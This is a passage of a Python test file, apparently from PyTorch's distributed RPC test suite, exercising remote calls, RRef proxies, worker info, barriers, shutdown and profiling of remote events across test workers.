worker_name(self.rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.local_value(), expected)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n, sparse),
kwargs=kwargs_fn(n, sparse),
)
)
expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
def _py_rref_args(self, a, b, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(a, b)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(x, y)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(x, y, z)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(x, y, z)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, expected)
def _nested_remote(self, f, expected):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), expected)
def _nested_rref(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _nested_rref_stress(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _my_parameter_server(self, sparse):
ps_rref = RRef(MyParameterServer(self.world_size - 1))
futures = []
for index in range(1, self.world_size):
futures.append(
rpc.rpc_async(
worker_name((self.rank + index) % self.world_size),
self._trainer_func,
args=(
ps_rref,
sparse
),
)
)
torch.futures.wait_all(futures)
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
class RpcTest(RpcAgentTestFixture, RpcTestCommon):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist().wait()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_pg_init_no_rpc_init(self):
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(3, 4)
def forward(self, x):
return self.lin(x)
model = MyModel()
model.train()
model = torch.nn.parallel.DistributedDataParallel(model)
with self.assertRaisesRegex(RuntimeError, 'Current RPC agent is not set! Did you initialize the RPC framework'):
params = []
for param in model.parameters():
params.append(RRef(param))
def test_world_size_one(self):
self._world_size_one(
torch.ones(2, 2),
torch.ones(2, 2)
)
@dist_init(setup_rpc=False)
def test_invalid_names(self):
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
# Test that WorkerInfo can be pickled and sent in RPC call
@dist_init
def test_worker_info_pickle(self):
dst_rank = (self.rank + 1) % self.world_size
worker_info = rpc.api.get_worker_info()
ret = rpc.rpc_sync(worker_name(dst_rank), identity, args=(worker_info,))
self.assertEqual(ret, worker_info)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
self._multi_rpc(False)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
og_func = rpc.api._wait_all_workers
def wait_all_workers_sleep(timeout):
try:
rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
except RuntimeError as ex:
raise ex
rpc.api._wait_all_workers = wait_all_workers_sleep
try:
with self.assertRaisesRegex(RuntimeError, ''):
rpc.shutdown(graceful=True, timeout=0.01)
finally:
rpc.api._wait_all_workers = og_func
dist.barrier()
def test_wait_all_workers_dense(self):
self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_dense(self):
self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This tests validates the implementation of barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with _profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with _profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with _profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with _profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixied when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event needs to be
# in the above set, the set is just a representative set of
# what we expect to see. The profiler can change and add more
# events, but we should always expect to see this representative
# set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with _profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate order remote events show up in profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
